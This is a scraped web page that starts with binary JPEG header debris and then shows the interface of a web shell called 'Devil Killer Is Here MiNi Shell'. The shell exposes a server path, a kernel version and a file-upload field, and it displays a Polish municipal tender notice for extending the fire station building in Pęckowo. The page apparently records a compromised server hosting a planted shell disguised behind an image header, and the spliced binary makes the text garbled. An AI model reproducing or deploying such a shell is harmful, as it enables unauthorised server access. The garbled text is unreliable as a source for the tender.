JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220323/0009513001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa budynku remizy OSP w Pęckowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Drawsko</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791075</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powstańców Wielkopolskich 121</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Drawsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-733</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">672569128</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@gminadrawsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminadrawsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa budynku remizy OSP w Pęckowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8758089b-aa7d-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00095130</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00021111/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Rozbudowa budynku remizy OSP w Pęckowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gminadrawsko <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gminadrawsko</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się za pomocą<br/>środków komunikacji elektronicznej za pośrednictwem platformy www.platformazakupowa.pl pod<br/>adresem https://platformazakupowa.pl/pn/gminadrawsko za pośrednictwem formularza „Wyślij<br/>wiadomość do zamawiającego”. Wszelką korespondencję związaną z niniejszym postępowaniem,<br/>należy przekazywać za pośrednictwem platformy. Korespondencję uważa się za przekazaną w<br/>terminie, jeśli dotrze do zamawiającego przed upływem wymaganego terminu. Każda ze stron na<br/>żądanie drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>2. Osobami uprawnionymi do kontaktu z Wykonawcami są:<br/>1) w zakresie dotyczącym przedmiotu zamówienia: Dariusz Bielawski, e-mail:<br/>komunalka@gminadrawsko.pl, tel. 67 2569128.<br/>2) w zakresie dotyczącym zagadnień proceduralnych:<br/>Dariusz Bielawski, e-mail: komunalka@gminadrawsko.pl tel 67 2569128<br/>3. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/gminadrawsko.<br/>4. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane były w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl/pn/gminadrawsko. i formularza „Wyślij wiadomość do zamawiającego”.<br/>5. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się<br/>datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij<br/>wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do<br/>zamawiającego.<br/>6. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie<br/>w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl do konkretnego wykonawcy.<br/>7. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>8. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie<br/>UTF8,<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>9. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1) – zwane dalej RODO, informuję, że:<br/>1. Administratorem Państwa danych osobowych jest Wójt Gminy Drawsko, ul. Powstańców<br/>Wielkopolskich 121, 64-733 Drawsko.<br/>2. Administrator wyznaczył inspektora ochrony danych, z którym mogą się Państwo skontaktować<br/>poprzez adres e-mail: urzad@gminadrawsko.pl, we wszystkich sprawach dotyczących przetwarzania<br/>danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych.<br/>3. Państwa dane osobowe przetwarzane będą na podstawie obowiązujących przepisów prawa,<br/>zawartych umów lub na podstawie udzielonej zgody, w celu wypełnienia obowiązków prawnych<br/>ciążących na administratorze danych, wynikających z zadań gminy – w oparciu o przepisy ustawy<br/>Prawo zamówień publicznych (Dz. U. z 2019 poz. 2019 ze zm. – dalej uPzp) oraz aktów wykonawczych<br/>do uPzp, związanych z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym<br/>w trybie przetargu nieograniczonego i realizacji umowy w sprawie zamówienia publicznego, zawarcia i<br/>realizacji umowy z osobą, której dane dotyczą, określonym w treści zgody.<br/>4. Podanie danych osobowych jest wymagane na podstawie przepisów prawa.<br/>5. Państwa dane osobowe będą przekazywane innym organom publicznym i podmiotom wyłącznie na<br/>podstawie obowiązujących przepisów prawa.<br/>6. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp, dostawcy systemu<br/>elektronicznego obiegu dokumentów, poczty elektronicznej, usług IT oraz podmioty wspierające w<br/>świadczeniu usług drogą elektroniczną, organy władzy publicznej oraz podmioty wykonujące zadania<br/>publiczne lub działające na zlecenie organów władzy publicznej - w zakresie i w celach, które wynikają<br/>z przepisów powszechnie obowiązującego prawa, inne podmioty, które przetwarzają dane osobowe na<br/>podstawie umów podpisanych z administratorem, oraz podmioty, które wystąpią o informacje na<br/>podstawie ustawy o dostępie do informacji publicznej.<br/>7. Nie podanie przez Państwo danych osobowych wyłącza możliwość realizacji celów określonych w<br/>pkt. 3.<br/>8. Państwa dane osobowe przetwarzane będą przez okres niezbędny do realizacji celów określonych w<br/>pkt. 3, a po tym czasie przez okres wynikający z obowiązujących przepisów prawa, w szczególności<br/>ustawy o narodowym zasobie archiwalnym i archiwach oraz aktach wykonawczych do tej ustawy, t.j. 5<br/>lat. W przypadku projektów dofinansowanych z budżetu Unii Europejskiej – okres przetwarzania<br/>wynikał będzie z zasad określonych w Wytycznych w zakresie kwalifikowalności wydatków w ramach<br/>Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego, Funduszu<br/>Spójności oraz Programu Operacyjnego Infrastruktura i Środowisko na lata 2014-2020.<br/>9. W odniesieniu do Państwa danych osobowych nie będą podejmowane w sposób zautomatyzowany,<br/>w tym nie będą profilowane.<br/>10. W zawiązku z przetwarzaniem Państwa danych osobowych jesteście Państwo uprawnieni do:<br/>1) dostępu do swoich danych osobowych,<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 – 3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą wskazania<br/>dodatkowych informacji mający na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego.<br/>2) sprostowania swoich danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego<br/>załączników);</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">wniesienia żądania ograniczenia przetwarzania danych<br/>osobowych (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego),<br/>4) wniesienia skargi do organu nadzorczego – Prezesa Urzędu Ochrony Danych Osobowych, w<br/>przypadku gdy przetwarzanie danych osobowych naruszyłoby przepisy ogólnego rozporządzenia o<br/>ochronie danych osobowych.<br/>11. Nie przysługuje Państwu prawo:<br/>- do usunięcia danych osobowych;<br/>- do przenoszenia danych osobowych;<br/>- sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych<br/>osobowych jest art. 6 ust.1 lit. c RODO.<br/>12. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o<br/>którym mowa art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GK-ZP.271.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 283052,16 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: .<br/>Rozbudowa budynku remizy OSP w Pęckowie wraz z usługami serwisowymi oraz<br/>konserwacyjnymi w zakresie wykonywanych elementów przez cały okres udzielonej gwarancji.<br/>Przedmiotem zamówienia jest przeprowadzenie prac inwestycyjnych związanych z<br/>wykonaniem „Rozbudowa budynku remizy OSP w Pęckowie” obejmującym swoim zakresem<br/>następujące prace:<br/>Projektuje się rozbudowę istniejącego budynku OSP o pomieszczenie garażowe i<br/>pomieszczenia gospodarcze. Dobudowa parterowa niepodpiwniczona, z dachem<br/>jednospadowym, opartym z jednej strony na ścianie istniejącego budynku, pokrytym papą<br/>termozgrzewalną . Poziom posadzki rozbudowanej części , jak w istniejącym budynku.<br/>Dane konstrukcyjno - materiałowe<br/>Fundamenty projektowane wykonać z betonu C 20/25 o szerokości 80 cm i wysokości 30 cm<br/>zbrojo-ne podłużnie stalą A-III 6 Ø 12 .Głębokość posadowienia ław min. 90 cm poniżej<br/>istniejącego terenu – fundamenty ścian szczytowych wykonać jako schodkowe, dostosowując<br/>ich poziom do fundamentów istniejących. W ławach osadzić pręty zbrojenia trzpieni żelbetowych<br/>( 4 Ф 12 mm A – III)<br/>Na fundamentach wykonać mur fundamentowy do wysokości 0,15 m ponad istniejący teren, z<br/>bloczków betonowych na zaprawie cementowej 8 MPa. Izolację pionową ścian fundamentowych<br/>należy wyko-nać w postaci 2-krotnego malowania środkami typu Dysperbit. Izolację termiczną<br/>ścian fundamentowych wykonać z płyt polistyrenu ekstrudowanego XPS gr 5 cm,<br/>zabezpieczonego od strony gruntu warstwą foli kubełkowej zakończonej 5 cm powyżej gruntu<br/>rozwiązaniem systemowym. Powyżej poziomu gruntu przewiduje się wykończenie cokołu<br/>tynkiem mozaikowym w kolorystyce uzgodnionej z Inwestorem na uprzednio wykonanej<br/>warstwie kleju elewacyjnego z zatopioną siatką do styropianów. Izolację poziomą ścian<br/>fundamentowych należy wykonać w postaci 2 x papa na lepiku bądź foli systemowej PE do<br/>ścian fundamentowych gr. min 1mm.<br/>Podczas prac fundamentowych należy potwierdzić szerokość i poziom posadowienia ław ściany<br/>podłużnej istniejącego budynku. W przypadku, gdy szerokość ławy będzie mniejsza, niż 30 cm<br/>,a jej posadowienie będzie mniejsze niż 50 cm poniżej istniejącego terenu , fundament należy<br/>podlać betonem B20 do poziomu -0,80 m i zapewnić szerokość ławy 40 cm.<br/>Fundamenty sprawdzono dla warunków gruntowych: piasek średni , średnio zagęszczony, woda<br/>gruntowa poniżej poziomu ław fundamentowych.<br/>Kategoria geotechniczna I.<br/>Ściany zewnętrzne<br/>Nowoprojektowane ściany wykonać z bloczków gazobetonowych gr 24 cm odmiany 600 na zaprawie<br/>ciepłochronnej z izolacją termiczną w postaci styropianu EPS – 032 fasada gr. 10 cm.Płyty styropianowe kleić do ścian zaprawa klejącą, mocować dodatkowo do ściany kołkami<br/>montażowymi pcv typu WBL lub WKL przyjmując min 7 szt. kołków w strefie brzegowej –<br/>minimum 2,0 m od naroży budynku i do wysokości 175cm od poziomu terenu. Na pozostałej<br/>płaszczyźnie ściany należy stosować minimum 4 kołki na m2. Na przygotowany styropian należy<br/>nanieść zaprawę klejową i zatopić w niej siatkę. Przygotowane podłoże należy zabezpieczyć<br/>preparatami typu „Cerplast”. Jako wykończenie warstwy elewacyjnej zastosować tynk silikatowy<br/>drobnoziarnisty.<br/>W ścianach zewnętrznych umieścić trzpienie żelbetowe o wymiarach 25 x 25 cm z betonu<br/>C20/25 zbrojone stalą A – III 4 Ø 12 mm , strzemiona zamknięte Ø 6 mm A –O co 10 – 20 cm.<br/>Ściany wewnętrzne<br/>Ściany wewnętrzne wykonać z bloczków gazobetonowych gr 24 cm<br/>odmiany 600, obustronnie tynkować tynkami cementowo-wapiennymi kat.III z wykończeniem<br/>gładzią szpachlową, 2 krotnym gruntowaniem oraz malowaniem farbami lateksowymi w kolorze<br/>uzgodnionym z Inwestorem.<br/>Nadproża, wieńce<br/>Wieniec W - o wymiarach 25 x 25cm z betonu C20/25 zbrojony stalą A-III 4 Ø 12, strzemiona Ø<br/>6 co 25 cm W wieńcu umieścić kotwy do mocowania murłat. Nad bramą garażową wieniec o<br/>szerokości 25 cm i wysoko-ści 25 cm oparty na trzpieniach żelbetowych. Nadproże<br/>strunobetonowe 2 x 12x12 cm.<br/>Nadproża okienne i drzwiowe z prefabrykowanych belek L-19.<br/>Istniejące otwory okienne po demontażu zostaną wykorzystane jako przejście do<br/>rozbudowywanej części , w wyniku rozbiórki muru międzyokiennego po osadzeniu nadproży<br/>strunobetonowych l= 2,4 m.<br/>Konstrukcja dachu<br/>Dach jednospadowy zaprojektowano z belek drewnianych klasy min C-24 o wymiarach 12x24<br/>cm opartych na wieńcu żelbetowym oraz wykutych otworach w istniejącej ścianie – oparcie na<br/>uprzednio wykonanych poduszkach betonowych, min. dł oparcia – 12cm. Końce belek<br/>drewnianych należy zabezpieczyć folią hydro izolacyjną bądź papą. Drewno impregnowane<br/>grzybo i ogniochronnie. Między belkami zastosować izolację termiczną w postaci wełny<br/>mineralnej gr. 20 cm. Sufit wykonać w postaci podwieszanego w systemie wieszaków i profili<br/>stalowych o rozstawie max. 40 cm z wykończeniem 2 razy płyta g-k ognioodporna, gipsowana i<br/>malowana. Jako przykrycie stropodachu zastosować płytę OSB-3 gr. 22 mm oraz styropapę ze<br/>spadkiem 2% o grubości zmiennej 4-30 cm z wierzchnią warstwą papy termozgrzewalnej na<br/>welonie poliestrowym gr min 5,2 mm.<br/>Strop nad parterem - sufit z płyt gipsowo – kartonowych wodo – ognioodpornych mocowany do<br/>konstrukcji dachu.<br/>Izolacje<br/>- Izolacje termiczne<br/>- dach ocieplony wełną mineralną grubości 20 mm ułożoną na paroizolacji.<br/>- nadproża i wieńce ocieplone styropianem grub. 10 cm<br/>- ściany ocieplone styropianem grub. 10 cm.<br/>- Izolacje przeciwwilgociowe i paroizolacje<br/>- izolacja pozioma ław fundamentowych i posadzki 2 x papa asfaltowa na lepiku lub folia<br/>izolacyjna<br/>- na dachu - 1x folia polietylenowa paroszczelna ( pod wełną ) oraz membrana wiatrochronna<br/>paroprzepuszczalna .<br/>Elementy wykończenia wewnętrznego<br/>- Podłogi i posadzki - zgodnie z opisem na rysunkach. Podkład konstrukcyjny z betonu C8/10 (B-<br/>10) zbrojonego siatka z prętów Ø 6mm o oczkach 20x20cm.<br/>- Tynki wewnętrzne i okładziny – Tynki cem-wapienne kat.III szpachlowane wyprawą gipsową.<br/>- Wykończenie zewnętrzne - mieszanki tynkarskie gotowe silikatowe w kolorze uzgodnionym z<br/>Inwestorem- Pokrycie – styropapa zgodnie z częścią rysunkową z wierzchnią warstwą papy<br/>termozgrzewalnej na welonie poliestrowym.<br/>- Stolarka okienna i drzwiowa - wg uznania inwestora spełniająca warunek izolacyjności<br/>Uc(max) &lt; 1,1 [W/(m2k)] okna i drzwi wg części rysunkowej. Okna nawiązujące do stolarki<br/>dotychczasowej. Wszystkie otwory drzwiowe do pomieszczeń użytkowych należy poszerzyć do<br/>szerokości skrzydła 90cm i zamontować je tak aby po otwarciu były wykładane na ścianę.<br/>Wszystkie płaszczyzny otwierane okien powinny posiadać uchwyty umożliwiające otwieranie z<br/>płaszczyzny podłogi. Parapety PCV o szerokościach wystających 5 cm poza lico ściany. Brama<br/>uchylna z napędem w kolorystyce istniejącej bramy typu „wiśniowski” bądź równoważny.<br/>Elementy wykończenia zewnętrznego<br/>- obróbki blacharskie z blachy ocynkowanej<br/>- rynny i rury spustowe z blachy stalowej ocynkowanej lub PVC<br/>- nad wejściem daszek z poliwęglanu – systemowy , mocowany do ściany.<br/>- schodki wejściowe z betonu na gruncie<br/>Wyposażenie w instalacje<br/>Rozbudowana część będzie wyposażona w instalację elektryczną oraz włączona do istniejącej<br/>instalacji c.o.<br/>Wentylacja ( przewietrzanie ) garażu poprzez umieszczenie w ścianie frontowej przy posadzce<br/>otworu nawiewnego o wymiarach 20 x 20 cm oraz wykonanie na przeciwległej ścianie na<br/>poziomie + 4,20 m kominka wentylacyjnego ściennego<br/>W przypadku stwierdzenia podczas realizacji robót innych warunków niż przyjęto w założeniach<br/>projektowych, a w szczególności innych niż przyjęto do obliczeń warunków gruntowych należy<br/>zawiadomić projektanta.<br/>Obliczenia statyczne znajdują się w egzemplarzu 